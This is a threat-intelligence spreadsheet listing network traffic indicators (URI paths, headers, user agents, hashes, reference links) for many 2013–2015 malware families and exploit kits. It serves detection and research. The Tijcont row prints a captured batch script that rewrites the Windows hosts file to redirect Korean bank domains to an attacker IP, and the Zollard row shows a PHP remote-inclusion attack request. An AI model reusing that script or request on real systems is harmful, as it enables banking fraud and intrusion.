2015 MALWARE TRAFFIC PATTERNS
 Share
The version of the browser you are using is no longer supported. Please upgrade to a supported browser.Dismiss

 
View only
 
 
ABCDEFGHIJKLMNOPQRSTUVWXYZ
1
addedtypefamilymethoduripath2headeruaportnotesmd5sref_urldl_sampledl_pcapstringsanalysis_dateCredit
2
2015-01-22CRIMECarberb / /GluptebaGET<p>/get_ads.php?yy=1&aid=2&atr=exts&src=199
<p>/go/p1011105.subexts
<p>/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
<p>/javascript/live_cd/popunder_script-1400195675.js
<p>/images/ffadult/css/header.css
<p>/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css
<p>/get_ads.php?yy=1&aid
<p>/go/
<p>/live_cd/
<p>/ffadult/
8085acec48c593832bdd57f90aec783a28http://malware-traffic-analysis.net/2014/12/25/index.html
3
2015-01-22CRIMEFiesta EKGET<p>/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G
&QPy3i=J4HP58S7h&dRPS8=7bi7Y
<p>/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
<p>/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
<p>/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
<p>/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2
/?80http://malware-traffic-analysis.net/2014/12/26/index.html
4
2015-01-22CRIMEFiesta EKGET<p>/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
<p>/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
<p>/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54
/ai_qkvu2/80http://malware-traffic-analysis.net/2014/12/17/index.html
5
2015-01-22CRIMEGongdad / Gong Da compromised site redirectsGET<p>/pg/kcp/index.html
<p>/popup/index.html
<p>/my/by4.html
<p> is to create a new line break in the Web version of the table - Replace with Domain/IPhttp://malware-traffic-analysis.net/2014/12/13/index.html
6
2015-01-22CRIMEGongdad / Gong Da EKGET<p>/data/file/cr/index.html
<p>/data/file/cr/swfobject.js
<p>/data/file/cr/jquery-1.4.2.min.js
<p>/data/file/cr/main.html
<p>/data/file/cr/AyVpSf.jar
<p>/data/file/cr/com.class
<p>/data/file/cr/edu.class
<p>/data/file/cr/net.class
<p>/data/file/cr/org.class /windos.exe
/data/file/cr/<p> is to create a new line break in the Web version of the table - Replace with Domain/IPhttp://malware-traffic-analysis.net/2014/12/13/index.html
7
2015-01-22CRIMEDalexis LoaderGET<p>/tmp/pack.tar.gz
<p>/assets/pack.tar.gz
<p>/piwigotest/pack.tar.gz
<p>/histoiredesarts/pack.tar.gz
<p>/fit/pack.tar.gz
/pack.tar.gz80http://blog.malcovery.com/blog/ctb-locker-the-newest-crypto-malware-now-via-spam
8
2015-01-22APTGholee / Rocket KittenGET / POST<p>/index.php?c=Ud7atknq&r=17117d
<p>/index.php?c=Ud7atknq&r=1710b2
/index.php?c=80http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
9
2015-01-22CRIMEZemotGET /b/shoe /b/shoe80http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.htmlhttp://bit.ly/aptsamples
10
2015-01-22CRIMEZemot DL via AsproxGET/catalog/159/catalog/15980https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
11
2015-01-22CRIMEZemot downloading RovnixGET/mod_jshopping_products_gdle/mod_smartslider2//mod_smartslider2/80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
12
2015-01-22CRIMEZemot downloading RerdomGET/mod_jshoppi/soft32.dl/soft32.dl80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
13
2015-01-22CRIMERerdomGET/b/eve/<redacted>/b/eve/8080https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
14
2015-01-22CRIMEClickfraud GET/b/req/<redacted>/b/req/80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
15
2015-01-22CRIMECidox / Rerdom / ClickfraudGET<p>/b/eve/e91425775cc5d7e657bd2cc7
<p>/b/letr/21D84379F768D95442B92BC5
<p>/b/opt/E1805AD5D79824076249D696
<p>/b/req/FDD953BA382388758DF27AE4
<p>/b/pkg/<redacted>
<p>/b/eve/
<p>/b/letr/
<p>/b/opt/
<p>/b/req/
<p>/b/pkg/
80http://www.malware-traffic-analysis.net/2014/07/21/index.html
16
2015-01-22CRIMECidox / Rerdom / Clickfraud - clickurl GETGET /x/48petqwk9/<redacted>/AA/0 /x/48petqwk9/80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
17
2015-01-22CRIMECidox / Rerdom / Clickfraud - clickurl GETGET/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.comreferrer http://controller-best.com80
18
2015-01-22APT / CRIMEScieron / Httneilc / HTClientpacket data <p>0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
<p>0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
<p>0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
<p>0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
<p>0040 00 12 00 63 01 00
8081<p>http://www.symantec.com/security_response/writeup.jsp?docid=2014-072320-5920-99
<p>http://www.symantec.com/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps
19
2015-01-22CRIMEZollard RFIPOST/cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E/cgi-bin/php?Host: <target server>
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1825
Connection: close
Mozilla/5.0 (compatible; Zollard; Linux)80
20
2015-01-21CRIMEUpatreGET<p>/js/jquery-1.41.15.js
<p>/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
<p>/js/jquery-1.41.15.js?get_message=3290013886
/js/jquery-1.41.15.js80<p> is to create a new line break in the Web version of the table - Replace with Domain/IPa752bedbbf6b73e52e2d7f8f3cd6a227 <p> 2c7810794a5027ddfc0568808dea3437http://malware-traffic-analysis.net/2015/01/21/index.htmlhttp://malware-traffic-analysis.net/2015/01/20/index2.html
21
2015-01-21CRIMECryptowall 3.0POST<p>http://proxy1-1-1.i2p/fee4roy2hih9
<p>http://payto4gtpn5czl2.torforall.com/ofs20c
i2p
torforall.com/ofs20c
80e67edfaa0d65e822fe41bf978ccd9c3chttps://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/
22
2015-01-21CRIMEAndromedaPOST/ldr.php/ldr.phpAccept: text/html, application/xhtml+xml, */*::~~Content-Type: application/x-www-form-urlencoded::~~Accept-Language: en-US:: ~~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko80
23
2015-01-21CRIMEAngler EK ChainGET/t19jl0hvv2.php80
24
2015-01-21CRIMEAngler EK ChainGET/752s2n0ndw.php80
25
2015-01-21CRIMEAngler EK ChainGET/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp80
26
2015-01-21CRIMEAngler EK ChainGET/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN80
27
2015-01-21CRIMEAngler EK ChainGET/models/runway/ring/header.js80
28
2015-01-21CRIMEAngler EK ChainGET/code/decrease/revenue/core.js80
29
2015-01-21CRIMEAsprox / KuluozGET/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
<p>HTTPS over port 443 as a possible connectivity check
/include.php?t=80http://malware-traffic-analysis.net/2015/01/02/index.html
30
2015-01-21CRIMEAsprox / KuluozPOST/index.php/index.php80http://malware-traffic-analysis.net/2015/01/02/index.html
31
2015-01-21CRIMEChanitorPOST/gate.php/gate.phpMozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.080
32
2015-01-21CRIMEChanitor DownloadsGET<p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
<p>/wp-includes/js/tinymce/skins/lightgray/1.php
<p>/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
<p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/1.php80
33
2015-01-21CRIMECryptowallPOST<p>/532boskc3i0
<p>/nvebi4m4ggdokz
<p>/wbkljtzpimbryt
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)80
34
2015-01-21CRIMECryptowallGET
<p>/wp-content/themes/exiportal/dh5x3a1815j
<p>/wp-content/themes/esther/6l7de
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)80
35
2015-01-21CRIMEDridex payloadGET<p>/mopsi/popsi.php
<p>/js/bin.exe
/popsi.php
/bin.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)80
36
2015-01-21CRIMEFake AV post compromiseGET/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn80http://www.malwaresigs.com/2014/02/07/fakeav-is-still-alive/
37
2015-01-21CRIMEFiesta EKGET<p>/txf9p_v8/ye1PlchZ7X9pFcl0o-y3
<p>/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
<p>/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406
/txf9p_v8/80http://malware-traffic-analysis.net/2015/01/20/index.html
38
2015-01-21CRIMEFlashpack EKGET/sv62a76d18537/index.php/index.php80
39
2015-01-21CRIMEGameThiefPOST/tj.asp/tj.asp80
40
2015-01-21CRIMEGameThiefGET/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack/count.asp?mac=80http://malware-traffic-analysis.net/2015/01/03/index.html
41
2015-01-21CRIMEGypothyGET/bigbight/kinkong.txt
/kinkong.txt~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)::~~Host: adakaobiri.com::~~Connection: Keep-Alive::~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)80
42
2015-01-21CRIMEH-W0rmPOST/SpCoderHere|pcname|hostname|username .. other pc data80
43
2015-01-21CRIMEKaiXin EKGET<p>/indexindex/
<p>/indexindex/gg.jpg
<p>/indexindex/jquery-1.4.2.min.js
<p>/indexindex/swfobject.js
<p>/indexindex/main.html
<p>/xzz1.exe
<p>/indexindex/NlNwQh.jar
<p>/indexindex/com.class
<p>/indexindex/edu.class
<p>/indexindex/net.class
<p>/indexindex/org.class
/indexindex/80http://malware-traffic-analysis.net/2015/01/03/index.html
44
2015-01-21CRIMEKovterPOST<p>/9/form.php
<p>/11/form.php
<p>/w1/form.php
<p>/1/feed.php
/form.phpContent-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko
Host: b7-golfix.org
Content-Length: 368
Cache-Control: no-cache
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko80
45
2015-01-21CRIMENuclear EKGET / POST<p>/XhBWV0gBT08OVFVW.html
<p>/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
<p>/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
80http://malware-traffic-analysis.net/2015/01/18/index2.html
46
2015-01-21CRIMEPoweliksGET<p>/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
?version=1.7&sid= ls=2Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)80
47
2015-01-21CRIMERedirect to Fiesta EKGET/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &
m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3
80http://malware-traffic-analysis.net/2015/01/20/index.html
48
2015-01-21CRIMESweet Orange EKGET<p>/admin4_account/mobile/movies.php?timeline=18
<p>/bad/generic/help.php?state=39
<p>/cnet/tmp/Indy_admin/investor.php?setup=20
<p>/dbadmin/wp-admin/hex/help.php?state=33
<p>/forums/example/screens/investor.php?setup=20
<p>/gcc/tmp/bad/help.php?state=25
<p>/ip/ch/investor.php?setup=20
<p>/profiles/stat/movies.php?timeline=21
<p>/timeline=18
<p>/state=39
<p>/setup=20
<p>/state=33
<p>/state=25
<p>/timeline=21
<p>/timeline=20
<p>/france=155
<p>/state=31
49
2015-01-21CRIMESweet Orange EKGET<p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
<p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
<p>/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
<p>/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
<p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
<p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
<p>/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
<p>/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315

<p>/printer.php
<p>/store.php
<p>/teen.php
<p>/serial.php

<p>/fixutil=repfix
<p>/repfix=fixutil
80
50
2015-01-21CRIMETBDPOST /store/ /store/80http://malware-traffic-analysis.net/2015/01/20/index2.html
51
2015-01-21CRIMETBD Post FlashpackGET<p>/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
<p>/search?q=wrestling&subid=4699
<p>/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
/r?q= /search?q= /click?q=80http://malware-traffic-analysis.net/2015/01/20/index.html
52
2015-01-21CRIMETBD Proxy (Htbot?)GET<p>/ocfg.php?command=getip
<p>/ocfg.php?command=getid
<p>/ocfg.php?command=ghl&id=1493496
<p>/ocfg.php?command=dl&id=1493496
<p>/ocfg.php?command=version&id=1493496
<p>/ocfg.php?command=getbackconnect
<p>/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW
/ocfg.php?command=80http://malware-traffic-analysis.net/2015/01/12/index.html
53
2015-01-21CRIMEUpatreGET<p>/1501us22/<PC--NAME>/0/51-SP3/0/
<p>/1501us22/<PC--NAME>/1/0/0/
<p>/2807cw/<PC-Name>/1/0/0/
<p>/2807cw/<PC-Name>/41/5/4/
<p>/2807cw/<PC-Name>/0/51-SP2/0/
<p>/1201uk1/<PC-Nam/0/61/0/
<p>/1201uk1/<PC-Name>/0/51-SP3/0/
<p>/1201uk1/<PC-Name>/1/0/0/
<p>/1201uk1/<PC-Name>/41/7/4/ "
<p>/2307stat/<PC-Name>/0/51Service%20Pack%202/0/
<p>/2307stat/<PC-Name>/1/0/0/
<p>/2307stat/<PC-Name>/41/5/4/

<p>/1201uk1/
<p>/2307stat/
<p>/2807cw/
<p>/1501us22/
Mozilla/5.0, Host: <IP:port>, Cache-Control: no-cache80
54
2015-01-21CRIMEVavtrak / NeverquestPOST/collection/0000004E/00/9EBD6132/collection/80http://malware-traffic-analysis.net/2015/01/18/index2.htmlhttp://malware-traffic-analysis.net/2015/01/18/index2.html
55
2015-01-21CRIMEZeusGET<p>/backup/config.bin
<p>/en/images/config.bin
<p>/guardnow/config.bin
<p>/guardnow/config.bin
/config.binAccept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)80
56
2015-01-21CRIMEZeusPOST/choosen/helps/file.php/helps/file.phpAccept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)80
57
2015-01-20CRIMEAdWare Kraddare.ILGET/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN::/config.php?q=^/irW@80http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
58
2015-01-20CRIMEAdWare Kraddare.ILPOST/bv/config.php/config.php80http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
59
2015-01-20CRIMEDyreGET/2001uk11/HOME/1/0/0//HOME/1/0/0/User-Agent: Mozilla/5.0
Host: 202.153.35.133:33384
Cache-Control: no-cache
Mozilla/5.080https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
60
2015-01-20CRIMEDyreGET/mandoc/eula012.pdf/eula012.pdfAccept: text/*, application/*
User-Agent: Mozilla/5.0
Host: clicherfort.com
Cache-Control: no-cache
Mozilla/5.080https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
61
2015-01-20CRIMEDyreGET/mandoc/ml1from1.tar/ml1from1.tarUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: essextwp.org
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
62
2015-01-20CRIMEDyre plugin dlGET/ineede900.rar80
63
2015-01-20CRIMEKazyGET/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR/api.php?mk=80https://www.virustotal.com/en/file/411e52c674faac375570a8786bf88bd849dbccc4aaa895aa59c6a3c0c568ccac/analysis/
64
2015-01-20CRIMEMudropGET/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=/gcs?alpha=Host: api.greenerweb.info
Cache-Control: no-store,no-cache
Pragma: no-cache
Connection: Keep-Alive
65
2013-11-12CRIMEChePro (Brazil.banker)GET/ini/xvwmmwb.mod/xvwmmwb.modAccept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.aspramece.com.br
Connection: Keep-Alive
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)embedded in RTF2A5E5D3C536DA346849750A4B8C8613A (RTF dropper)
6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper)
http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_fileshttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/11/brazilian-bamker-cinternetbankingcpl.html11/12/2013
66
2013-10-15CRIMECryptolockerPOST/home//home/Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: rwyngtbvunfpk.org
Content-Length: 192
Connection: Close
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)crypt_1_sell23-09.exe_9cbb128e8211a7cd00729c159815cb1chttp://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/http://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/10/cryptolocker-strings-CRIME.html10/14/2013
67
2013-09-10CRIMEReedum220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
USER user37704
331 .................. ............ ...... ........................ user37704
PASS intro22
230 ........................ user37704 ..................
TYPE A
200 ...... .................... .. A
PORT 10,0,2,15,4,24
500 ........................ .............. PORT
LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
500 LPRT .... ....................
0ca4f93a848cf01348336a8c6ff22dafhttp://www.naked-security.com/malware/Infostealer.Reedum/http://bit.ly/crimesampleshttp://bit.ly/crimepcaps3/1/2013
68
2013-09-09APTVidgrabPOST(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.....3
HTTP/1.1 301 Moved Permanently
Location:http://windowsupdate.microsoft.com/
Content-Type: text/html
Connection: Keep-Alive
<h1>Bad Request (Invalid Verb)</h1>
.....HK|(172.16.253.130)|1067|WinXP|D|L|No|0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.
660709324acb88ef11f71782af28a1f0http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html#morehttp://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/09/vidgrab-strings-apt.html9/8/2013
69
2013-09-08APTPage / stscout / Elise / lStudio / WuminsGET/29af9cdc/page_12082223.html/page_Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: gorush.dyndns-web.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Mozilla/4.0 (compatible; MSIE 8.0; Win32)443aaf73666cbd750ed22b80ed836d2b1e4http://www.fireeye.com/blog/technical/exploits-vulnerabilities/2012/09/analysis-of-malware-page.html#morehttp://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/09/page-elise-lstudio-wumins-strings-apt.html9/8/2013
70
2013-09-08CRIMETijcontGET/s/blog_b2afd7fe01019tkf.htm/blog_/3.txt
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 110.34.198.123:888
Connection: Keep-Alive

/s/blog_b2afd7fe01019tkf.html
User-Agent: getURLDown
Host: blog.sina.com.cn

/album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg
User-Agent: loadMM
Host: e.hiphotos.bdimg.com
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ** User-Agent: getURLDown ** User-Agent: loadMM80,6000,8888,C2 Server reply

@echo off
echo.
del %systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93.ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 open.hanabank.com>>%systemroot%\system32\driver....
etc
845b0945d5fe0e0aaa16234dc21484e0http://my.opera.com/cjbi/blog/index.dml/tag/Tijconthttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/09/tijcont-strings-CRIME.html9/8/2013
71
2013-09-08APTDarkcometGET/a.php?id=c2ViYWxpQGxpYmVyby5pdA==/a.php?id=/a.php?id=c2ViYWxpQGxpYmVyby5pdA==
Host: [ip.address]
nonedc98abba995771480aecf4769a88756ehttp://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/http://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/09/dark-comet-strings-apt.html9/8/2013
72
2013-09-08CRIMEKelihosGET/index.htm/index.htm
Host: 188.129.243.106
Content-Length: 164
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0

..D.lUUE..H@.q..#.....K.zfgE0F.A..K.

Variants:
/default.htm ** /file.htm ** /home.htm ** /index.htm ** /install.htm ** /login.htm ** /main.htm ** /online.htm ** /search.htm ** /setup.htm ** /start.htm ** /index.htm
Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)
Mozilla/5.0 (Windows NT 5.0; rv:21.0)
Mozilla/5.0 (Windows NT 5.1)
